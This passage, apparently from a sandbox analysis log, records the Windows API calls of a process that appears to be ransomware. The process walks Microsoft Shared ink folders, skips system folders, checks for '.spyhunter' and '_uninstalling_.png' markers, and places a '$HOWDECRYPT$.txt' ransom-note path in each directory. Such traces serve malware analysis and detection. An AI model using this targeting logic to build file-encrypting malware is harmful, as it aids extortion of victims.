Ptr=0x3867e8, Size=0x940) returned 0x3867e8 [0086.887] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.887] lstrcmpiW (lpString1="web", lpString2="Windows") returned -1 [0086.887] lstrlenW (lpString="Windows") returned 7 [0086.887] lstrcmpiW (lpString1="web", lpString2="$Recycle.bin") returned 1 [0086.887] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.887] lstrcmpiW (lpString1="web", lpString2="System Volume Information") returned 1 [0086.887] lstrlenW (lpString="System Volume Information") returned 25 [0086.887] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web") returned 72 [0086.887] lstrcmpW (lpString1="web", lpString2=".") returned 1 [0086.887] lstrcmpW (lpString1="web", lpString2="..") returned 1 [0086.887] GetProcessHeap () returned 0x2c0000 [0086.887] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x373808 [0086.887] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*") returned 74 [0086.887] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\*", lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0x335fe0 [0086.888] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.888] lstrlenW (lpString="Windows") returned 7 [0086.888] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.888] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.888] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.888] lstrlenW (lpString="System Volume Information") returned 25 [0086.888] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\.") returned 74 [0086.888] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.888] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.888] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.888] lstrlenW (lpString="Windows") returned 7 [0086.888] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.889] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.889] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.889] lstrlenW (lpString="System Volume Information") returned 25 [0086.889] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\..") returned 75 [0086.889] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.889] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.889] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 1 [0086.889] lstrcmpiW (lpString1="webbase.xml", lpString2="Windows") returned -1 [0086.889] lstrlenW (lpString="Windows") returned 7 [0086.889] lstrcmpiW (lpString1="webbase.xml", lpString2="$Recycle.bin") returned 1 [0086.889] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.889] lstrcmpiW (lpString1="webbase.xml", lpString2="System Volume Information") returned 1 [0086.889] lstrlenW (lpString="System Volume Information") returned 25 [0086.889] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml") returned 84 [0086.889] StrStrIW (lpFirst="webbase.xml", lpSrch=".spyhunter") returned 0x0 [0086.889] lstrcmpW (lpString1="webbase.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.889] lstrcmpW (lpString1="webbase.xml", lpString2="_uninstalling_.png") returned 1 [0086.889] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml") returned 84 [0086.889] GetProcessHeap () returned 0x2c0000 [0086.889] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xea) returned 0x354528 [0086.889] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x948) returned 0x3867e8 [0086.889] FindNextFileW (in: hFindFile=0x335fe0, lpFindFileData=0x298e958 | out: lpFindFileData=0x298e958) returned 0 [0086.889] FindClose (in: hFindFile=0x335fe0 | out: hFindFile=0x335fe0) returned 1 [0086.889] wnsprintfW (in: pszDest=0x373808, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\$HOWDECRYPT$.txt") returned 89 [0086.889] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\$HOWDECRYPT$.txt") returned 89 [0086.890] GetProcessHeap () returned 0x2c0000 [0086.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf4) returned 0x353938 [0086.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x950) returned 0x3867e8 [0086.890] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.890] lstrcmpiW (lpString1="web.xml", lpString2="Windows") returned -1 [0086.890] lstrlenW (lpString="Windows") returned 7 [0086.890] lstrcmpiW (lpString1="web.xml", lpString2="$Recycle.bin") returned 1 [0086.890] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.890] lstrcmpiW (lpString1="web.xml", lpString2="System Volume Information") returned 1 [0086.890] lstrlenW (lpString="System Volume Information") returned 25 [0086.890] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 76 [0086.890] StrStrIW (lpFirst="web.xml", lpSrch=".spyhunter") returned 0x0 [0086.890] lstrcmpW (lpString1="web.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.890] lstrcmpW (lpString1="web.xml", lpString2="_uninstalling_.png") returned 1 [0086.890] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web.xml") returned 76 [0086.890] GetProcessHeap () returned 0x2c0000 [0086.890] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372870 [0086.890] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x958) returned 0x3867e8 [0086.890] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.890] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.890] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\$HOWDECRYPT$.txt") returned 85 [0086.890] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\$HOWDECRYPT$.txt") returned 85 [0086.890] GetProcessHeap () returned 0x2c0000 [0086.891] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x354620 [0086.891] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x960) returned 0x3867e8 [0086.893] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.893] lstrcmpiW (lpString1="he-IL", lpString2="Windows") returned -1 [0086.893] lstrlenW (lpString="Windows") returned 7 [0086.893] lstrcmpiW (lpString1="he-IL", lpString2="$Recycle.bin") returned 1 [0086.893] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.893] lstrcmpiW (lpString1="he-IL", lpString2="System Volume Information") returned -1 [0086.893] lstrlenW (lpString="System Volume Information") returned 25 [0086.893] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL") returned 60 [0086.893] lstrcmpW (lpString1="he-IL", lpString2=".") returned 1 [0086.893] lstrcmpW (lpString1="he-IL", lpString2="..") returned 1 [0086.893] GetProcessHeap () returned 0x2c0000 [0086.893] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.894] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*") returned 62 [0086.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.895] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.895] lstrlenW (lpString="Windows") returned 7 [0086.895] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.895] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.895] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.895] lstrlenW (lpString="System Volume Information") returned 25 [0086.895] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\.") returned 62 [0086.895] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.895] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.895] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.895] lstrlenW (lpString="Windows") returned 7 [0086.895] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.895] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.895] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.895] lstrlenW (lpString="System Volume Information") returned 25 [0086.895] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\..") returned 63 [0086.895] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.895] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.895] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.895] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.895] lstrlenW (lpString="Windows") returned 7 [0086.896] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.896] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.896] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.896] lstrlenW (lpString="System Volume Information") returned 25 [0086.896] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned 76 [0086.896] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.896] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.896] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.896] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\tipresx.dll.mui") returned 76 [0086.896] GetProcessHeap () returned 0x2c0000 [0086.896] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3726a0 [0086.896] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x968) returned 0x3867e8 [0086.896] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.897] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.897] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\$HOWDECRYPT$.txt") returned 77 [0086.897] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\he-IL\\$HOWDECRYPT$.txt") returned 77 [0086.897] GetProcessHeap () returned 0x2c0000 [0086.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372958 [0086.897] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x970) returned 0x3867e8 [0086.897] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.897] lstrcmpiW (lpString1="hr-HR", lpString2="Windows") returned -1 [0086.897] lstrlenW (lpString="Windows") returned 7 [0086.897] lstrcmpiW (lpString1="hr-HR", lpString2="$Recycle.bin") returned 1 [0086.897] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.897] lstrcmpiW (lpString1="hr-HR", lpString2="System Volume Information") returned -1 [0086.897] lstrlenW (lpString="System Volume Information") returned 25 [0086.897] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR") returned 60 [0086.897] lstrcmpW (lpString1="hr-HR", lpString2=".") returned 1 [0086.897] lstrcmpW (lpString1="hr-HR", lpString2="..") returned 1 [0086.897] GetProcessHeap () returned 0x2c0000 [0086.897] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.897] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*") returned 62 [0086.897] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.898] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.898] lstrlenW (lpString="Windows") returned 7 [0086.898] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.898] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.898] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.898] lstrlenW (lpString="System Volume Information") returned 25 [0086.898] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\.") returned 62 [0086.898] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.898] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.898] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.898] lstrlenW (lpString="Windows") returned 7 [0086.898] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.898] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.898] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.898] lstrlenW (lpString="System Volume Information") returned 25 [0086.898] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\..") returned 63 [0086.899] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.899] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.899] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.899] lstrlenW (lpString="Windows") returned 7 [0086.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.899] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.899] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.899] lstrlenW (lpString="System Volume Information") returned 25 [0086.899] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned 76 [0086.899] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.899] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.899] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\tipresx.dll.mui") returned 76 [0086.899] GetProcessHeap () returned 0x2c0000 [0086.899] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372a40 [0086.899] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x978) returned 0x3867e8 [0086.899] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.899] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.899] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\$HOWDECRYPT$.txt") returned 77 [0086.899] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hr-HR\\$HOWDECRYPT$.txt") returned 77 [0086.899] GetProcessHeap () returned 0x2c0000 [0086.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372b28 [0086.900] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x980) returned 0x3867e8 [0086.900] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.900] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0086.900] lstrlenW (lpString="Windows") returned 7 [0086.900] lstrcmpiW (lpString1="hu-HU", lpString2="$Recycle.bin") returned 1 [0086.900] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.900] lstrcmpiW (lpString1="hu-HU", lpString2="System Volume Information") returned -1 [0086.900] lstrlenW (lpString="System Volume Information") returned 25 [0086.900] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU") returned 60 [0086.900] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0086.900] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0086.900] GetProcessHeap () returned 0x2c0000 [0086.900] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.900] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*") returned 62 [0086.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.901] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.901] lstrlenW (lpString="Windows") returned 7 [0086.901] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.901] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.901] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.901] lstrlenW (lpString="System Volume Information") returned 25 [0086.901] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\.") returned 62 [0086.901] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.901] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.901] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.901] lstrlenW (lpString="Windows") returned 7 [0086.901] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.901] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.901] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.901] lstrlenW (lpString="System Volume Information") returned 25 [0086.901] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\..") returned 63 [0086.901] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.901] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.901] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.901] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0086.901] lstrlenW (lpString="Windows") returned 7 [0086.901] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$Recycle.bin") returned 1 [0086.901] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.901] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="System Volume Information") returned 1 [0086.901] lstrlenW (lpString="System Volume Information") returned 25 [0086.901] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned 76 [0086.901] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".spyhunter") returned 0x0 [0086.902] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.902] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0086.902] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\tipresx.dll.mui") returned 76 [0086.902] GetProcessHeap () returned 0x2c0000 [0086.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x372c10 [0086.902] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x988) returned 0x3867e8 [0086.902] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.902] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.902] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\$HOWDECRYPT$.txt") returned 77 [0086.902] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hu-HU\\$HOWDECRYPT$.txt") returned 77 [0086.902] GetProcessHeap () returned 0x2c0000 [0086.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x372cf8 [0086.902] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x990) returned 0x3867e8 [0086.902] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.902] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="Windows") returned -1 [0086.902] lstrlenW (lpString="Windows") returned 7 [0086.902] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="$Recycle.bin") returned 1 [0086.902] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.902] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="System Volume Information") returned -1 [0086.902] lstrlenW (lpString="System Volume Information") returned 25 [0086.902] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned 70 [0086.903] StrStrIW (lpFirst="hwrcommonlm.dat", lpSrch=".spyhunter") returned 0x0 [0086.903] lstrcmpW (lpString1="hwrcommonlm.dat", lpString2="$HOWDECRYPT$.txt") returned 1 [0086.903] lstrcmpW (lpString1="hwrcommonlm.dat", lpString2="_uninstalling_.png") returned 1 [0086.903] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned 70 [0086.903] GetProcessHeap () returned 0x2c0000 [0086.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x324638 [0086.903] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3867e8, Size=0x998) returned 0x3867e8 [0086.903] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0086.903] lstrcmpiW (lpString1="HWRCustomization", lpString2="Windows") returned -1 [0086.903] lstrlenW (lpString="Windows") returned 7 [0086.903] lstrcmpiW (lpString1="HWRCustomization", lpString2="$Recycle.bin") returned 1 [0086.903] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.903] lstrcmpiW (lpString1="HWRCustomization", lpString2="System Volume Information") returned -1 [0086.903] lstrlenW (lpString="System Volume Information") returned 25 [0086.903] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned 71 [0086.903] lstrcmpW (lpString1="HWRCustomization", lpString2=".") returned 1 [0086.903] lstrcmpW (lpString1="HWRCustomization", lpString2="..") returned 1 [0086.903] GetProcessHeap () returned 0x2c0000 [0086.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0086.903] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*") returned 73 [0086.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0086.904] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0086.904] lstrlenW (lpString="Windows") returned 7 [0086.904] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0086.904] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.904] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0086.904] lstrlenW (lpString="System Volume Information") returned 25 [0086.904] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\.") returned 73 [0086.904] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0086.904] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0086.904] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0086.905] lstrlenW (lpString="Windows") returned 7 [0086.905] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0086.905] lstrlenW (lpString="$Recycle.bin") returned 12 [0086.905] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0086.905] lstrlenW (lpString="System Volume Information") returned 25 [0086.905] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\..") returned 74 [0086.905] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0086.905] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0086.905] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0086.905] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0086.905] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\$HOWDECRYPT$.txt") returned 88 [0086.905] lstrlenW 